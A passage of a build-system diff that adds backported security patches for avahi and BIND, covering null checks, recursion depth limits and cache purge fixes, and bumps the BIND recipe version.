+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
++ if (!hn)
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+ h = hn;
+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+ avahi_free(h);
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ }
+
+ avahi_free(h);
+@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
+ h = label_escaped;
+ len = sizeof(label_escaped);
+ if (!avahi_escape_label(label, strlen(label), &h, &len))
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+
+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
+ avahi_free(s->host_name);
+ s->host_name = avahi_strdup(label_escaped);
+ if (!s->host_name)
+- return AVAHI_ERR_NO_MEMORY;
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+
+ update_fqdn(s);
+
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..f49d990a42
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ assert(error == AVAHI_ERR_INVALID_RECORD);
+ avahi_string_list_free(txt);
+
++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++ assert(error != AVAHI_OK);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.7/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+ if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+
+- if (avahi_rdata_parse (r, rdata, size) < 0) {
++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+ avahi_record_unref (r);
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+ }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..59f6806c85
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c | 3 +++
+ avahi-common/alternative.c | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.7/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative-test.c
++++ avahi-0.7/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ const char* const test_strings[] = {
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++ ").",
++ "\\.",
++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+ "gurke",
+ "-",
+ " #",
+Index: avahi-0.7/avahi-common/alternative.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative.c
++++ avahi-0.7/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+
+ char *avahi_alternative_host_name(const char *s) {
++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++ char *alt, *r, *ret;
+ const char *e;
+- char *r;
++ size_t len;
+
+ assert(s);
+
+ if (!avahi_is_valid_host_name(s))
+ return NULL;
+
+- if ((e = strrchr(s, '-'))) {
++ if (!avahi_unescape_label(&s, label, sizeof(label)))
++ return NULL;
++
++ if ((e = strrchr(label, '-'))) {
+ const char *p;
+
+ e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+
+ if (e) {
+ char *c, *m;
+- size_t l;
+ int n;
+
+ n = atoi(e)+1;
+ if (!(m = avahi_strdup_printf("%i", n)))
+ return NULL;
+
+- l = e-s-1;
++ len = e-label-1;
+
+- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+
+- if (!(c = avahi_strndup(s, l))) {
++ if (!(c = avahi_strndup(label, len))) {
+ avahi_free(m);
+ return NULL;
+ }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+ } else {
+ char *c;
+
+- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+ return NULL;
+
+ drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+ avahi_free(c);
+ }
+
++ alt = alternative;
++ len = sizeof(alternative);
++ ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++ avahi_free(r);
++ r = avahi_strdup(ret);
++
+ assert(avahi_is_valid_host_name(r));
+
+ return r;
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
new file mode 100644
index 0000000000..940c6776d3
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
+From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
+Date: Thu, 8 Sep 2022 11:11:30 +0200
+Subject: [PATCH 1/3] Bound the amount of work performed for delegations
+
+Limit the amount of database lookups that can be triggered in
+fctx_getaddresses() (i.e. when determining the name server addresses to
+query next) by setting a hard limit on the number of NS RRs processed
+for any delegation encountered. Without any limit in place, named can
+be forced to perform large amounts of database lookups per each query
+received, which severely impacts resolver performance.
+
+The limit used (20) is an arbitrary value that is considered to be big
+enough for any sane DNS delegation.
+
+(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
+
+Upstream-Status: Backport
+CVE: CVE-2022-2795
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/resolver.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 8ae9a993bbd7..ac9a9ef5d009 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -180,6 +180,12 @@
+ */
+ #define NS_FAIL_LIMIT 4
+ #define NS_RR_LIMIT 5
++/*
++ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
++ * any NS RRset encountered, to avoid excessive resource use while processing
++ * large delegations.
++ */
++#define NS_PROCESSING_LIMIT 20
+
+ /* Number of hash buckets for zone counters */
+ #ifndef RES_DOMAIN_BUCKETS
+@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ bool need_alternate = false;
+ bool all_spilled = true;
+ unsigned int no_addresses = 0;
++ unsigned int ns_processed = 0;
+
+ FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
+
+@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+
+ dns_rdata_reset(&rdata);
+ dns_rdata_freestruct(&ns);
++
++ if (++ns_processed >= NS_PROCESSING_LIMIT) {
++ result = ISC_R_NOMORE;
++ break;
++ }
+ }
+ if (result != ISC_R_NOMORE) {
+ return (result);
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
new file mode 100644
index 0000000000..0ef87fd260
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
+From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:15:34 +1000
+Subject: [PATCH 2/3] Free eckey on siglen mismatch
+
+Upstream-Status: Backport
+CVE: CVE-2022-38177
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/opensslecdsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
+index 83b5b51cd78c..7576e04ac635 100644
+--- a/lib/dns/opensslecdsa_link.c
++++ b/lib/dns/opensslecdsa_link.c
+@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ECDSA384SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(DST_R_VERIFYFAILURE);
+
+ if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
+ DST_RET (dst__openssl_toresult3(dctx->category,
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
new file mode 100644
index 0000000000..e0b398e24a
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
+From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:28:13 +1000
+Subject: [PATCH 3/3] Free ctx on invalid siglen
+
+(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
+
+Upstream-Status: Backport
+CVE: CVE-2022-38178
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/openssleddsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
+index 8b115ec283f0..b4fcd607c131 100644
+--- a/lib/dns/openssleddsa_link.c
++++ b/lib/dns/openssleddsa_link.c
+@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ED448SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(ISC_R_NOTIMPLEMENTED);
+
+ isc_buffer_usedregion(buf, &tbsreg);
+
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
new file mode 100644
index 0000000000..6f6c104530
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
+Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
+Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
+CVE: CVE-2023-2828
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+
+---
+ lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
+ 1 file changed, 63 insertions(+), 43 deletions(-)
+
+diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
+index b1b928c..3165e26 100644
+--- a/lib/dns/rbtdb.c
++++ b/lib/dns/rbtdb.c
+@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ bool tree_locked, expire_t reason);
+ static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked);
++ size_t purgesize, bool tree_locked);
+ static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
+ rdatasetheader_t *newheader);
+ static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
+@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
+
+ static dns_dbmethods_t zone_methods;
+
++static size_t
++rdataset_size(rdatasetheader_t *header) {
++ if (!NONEXISTENT(header)) {
++ return (dns_rdataslab_size((unsigned char *)header,
++ sizeof(*header)));
++ }
++
++ return (sizeof(*header));
++}
++
+ static isc_result_t
+ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
+@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ }
+
+ if (cache_is_overmem)
+- overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
++ overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
++ tree_locked);
+
+ NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
+ isc_rwlocktype_write);
+@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ cleanup_dead_nodes(rbtdb, rbtnode->locknum);
+
+ header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
++ if (header != NULL) {
++ dns_ttl_t rdh_ttl = header->rdh_ttl;
++
++ if (rdh_ttl < now - RBTDB_VIRTUAL) {
++ expire_header(rbtdb, header, tree_locked,
++ expire_ttl);
++ }
++ }
+
+ /*
+ * If we've been holding a write lock on the tree just for
+@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
+ }
+
++static size_t
++expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
++ bool tree_locked) {
++ rdatasetheader_t *header, *header_prev;
++ size_t purged = 0;
++
++ for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
++ header != NULL && purged <= purgesize; header = header_prev)
++ {
++ header_prev = ISC_LIST_PREV(header, link);
++ /*
++ * Unlink the entry at this point to avoid checking it
++ * again even if it's currently used someone else and
++ * cannot be purged at this moment. This entry won't be
++ * referenced any more (so unlinking is safe) since the
++ * TTL was reset to 0.
++ */
++ ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
++ size_t header_size = rdataset_size(header);
++ expire_header(rbtdb, header, tree_locked, expire_lru);
++ purged += header_size;
++ }
++
++ return (purged);
++}
++
+ /*%
+- * Purge some expired and/or stale (i.e. unused for some period) cache entries
+- * under an overmem condition. To recover from this condition quickly, up to
+- * 2 entries will be purged. This process is triggered while adding a new
+- * entry, and we specifically avoid purging entries in the same LRU bucket as
+- * the one to which the new entry will belong. Otherwise, we might purge
+- * entries of the same name of different RR types while adding RRsets from a
+- * single response (consider the case where we're adding A and AAAA glue records
+- * of the same NS name).
+- */
++ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
++ * entries under the overmem condition. To recover from this condition quickly,
++ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
++ *
++ * This process is triggered while adding a new entry, and we specifically avoid
++ * purging entries in the same LRU bucket as the one to which the new entry will
++ * belong. Otherwise, we might purge entries of the same name of different RR
++ * types while adding RRsets from a single response (consider the case where
++ * we're adding A and AAAA glue records of the same NS name).
++*/
+ static void
+-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked)
++overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
++ bool tree_locked)
+ {
+- rdatasetheader_t *header, *header_prev;
+ unsigned int locknum;
+- int purgecount = 2;
++ size_t purged = 0;
+
+ for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
+- locknum != locknum_start && purgecount > 0;
++ locknum != locknum_start && purged <= purgesize;
+ locknum = (locknum + 1) % rbtdb->node_lock_count) {
+ NODE_LOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
+
+- header = isc_heap_element(rbtdb->heaps[locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
+- purgecount--;
+- }
+-
+- for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
+- header != NULL && purgecount > 0;
+- header = header_prev) {
+- header_prev = ISC_LIST_PREV(header, link);
+- /*
+- * Unlink the entry at this point to avoid checking it
+- * again even if it's currently used someone else and
+- * cannot be purged at this moment. This entry won't be
+- * referenced any more (so unlinking is safe) since the
+- * TTL was reset to 0.
+- */
+- ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
+- link);
+- expire_header(rbtdb, header, tree_locked,
+- expire_lru);
+- purgecount--;
+- }
++ purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
++ tree_locked);
+
+ NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
new file mode 100644
index 0000000000..be479cb00e
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
+From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Tue, 20 Jun 2023 15:21:36 +1000
+Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
+
+Named and rndc do not need a lot of recursion so the depth is
+set to 10.
+
+Taken from BIND 9.16.44 change.
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
+CVE: CVE-2023-3341
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/isccc/cc.c | 38 +++++++++++++++++++++++---------
+ lib/isccc/include/isccc/result.h | 4 +++-
+ lib/isccc/result.c | 4 +++-
+ 3 files changed, 34 insertions(+), 12 deletions(-)
+
+diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
+index e012685..8eac3d6 100644
+--- a/lib/isccc/cc.c
++++ b/lib/isccc/cc.c
+@@ -53,6 +53,10 @@
+
+ #define MAX_TAGS 256
+ #define DUP_LIFETIME 900
++#ifndef ISCCC_MAXDEPTH
++#define ISCCC_MAXDEPTH \
++ 10 /* Big enough for rndc which just sends a string each way. */
++#endif
+
+ typedef isccc_sexpr_t *sexpr_ptr;
+
+@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp);
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
++list_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **listp);
+
+ static isc_result_t
+-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
++value_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **valuep) {
+ unsigned int msgtype;
+ uint32_t len;
+ isccc_sexpr_t *value;
+ isccc_region_t active;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ if (REGION_SIZE(*source) < 1 + 4)
+ return (ISC_R_UNEXPECTEDEND);
+ GET8(msgtype, source->rstart);
+@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ } else
+ result = ISC_R_NOMEMORY;
+ } else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
+- result = table_fromwire(&active, NULL, 0, valuep);
++ result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
+ else if (msgtype == ISCCC_CCMSGTYPE_LIST)
+- result = list_fromwire(&active, valuep);
++ result = list_fromwire(&active, depth + 1, valuep);
+ else
+ result = ISCCC_R_SYNTAX;
+
+@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp)
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
+ {
+ char key[256];
+ uint32_t len;
+@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+
+ REQUIRE(alistp != NULL && *alistp == NULL);
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ checksum_rstart = NULL;
+ first_tag = true;
+ alist = isccc_alist_create();
+@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ GET_MEM(key, len, source->rstart);
+ key[len] = '\0'; /* Ensure NUL termination. */
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS)
+ goto bad;
+ if (isccc_alist_define(alist, key, value) == NULL) {
+@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ }
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
++list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
+ isccc_sexpr_t *list, *value;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ list = NULL;
+ while (!REGION_EMPTY(*source)) {
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS) {
+ isccc_sexpr_free(&list);
+ return (result);
+@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
+ if (version != 1)
+ return (ISCCC_R_UNKNOWNVERSION);
+
+- return (table_fromwire(source, secret, algorithm, alistp));
++ return (table_fromwire(source, secret, algorithm, 0, alistp));
+ }
+
+ static isc_result_t
+diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
+index 6c79dd7..a85861c 100644
+--- a/lib/isccc/include/isccc/result.h
++++ b/lib/isccc/include/isccc/result.h
+@@ -47,8 +47,10 @@
+ #define ISCCC_R_CLOCKSKEW (ISC_RESULTCLASS_ISCCC + 4)
+ /*% Duplicate */
+ #define ISCCC_R_DUPLICATE (ISC_RESULTCLASS_ISCCC + 5)
++/*% Maximum recursion depth */
++#define ISCCC_R_MAXDEPTH (ISC_RESULTCLASS_ISCCC + 6)
+
+-#define ISCCC_R_NRESULTS 6 /*%< Number of results */
++#define ISCCC_R_NRESULTS 7 /*%< Number of results */
+
+ ISC_LANG_BEGINDECLS
+
+diff --git a/lib/isccc/result.c b/lib/isccc/result.c
+index 8419bbb..325200b 100644
+--- a/lib/isccc/result.c
++++ b/lib/isccc/result.c
+@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
+ "bad auth", /* 3 */
+ "expired", /* 4 */
+ "clock skew", /* 5 */
+- "duplicate" /* 6 */
++ "duplicate", /* 6 */
++ "max depth", /* 7 */
+ };
+
+ static const char *ids[ISCCC_R_NRESULTS] = {
+@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
+ "ISCCC_R_EXPIRED",
+ "ISCCC_R_CLOCKSKEW",
+ "ISCCC_R_DUPLICATE",
++ "ISCCC_R_MAXDEPTH",
+ };
+
+ #define ISCCC_RESULT_RESULTSET 2
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bind/bind_9.11.22.bb b/meta/recipes-connectivity/bind/bind_9.11.37.bb
index 3b4a299b36..95bb5be005 100644
--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
SUMMARY = "ISC Internet Domain Name Server"
HOMEPAGE = "https://www.isc.org/bind/"
+DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
SECTION = "console/network"
LICENSE = "ISC & BSD"
-LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45"
+LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
DEPENDS = "openssl libcap zlib"
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
file://0001-avoid-start-failure-with-bind-user.patch \
+ file://CVE-2022-2795.patch \
+ file://CVE-2022-38177.patch \
+ file://CVE-2022-38178.patch \
+ file://CVE-2023-2828.patch \
+ file://CVE-2023-3341.patch \
"
-SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9"
+SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index f34ba0dce5..74fd344170 100644
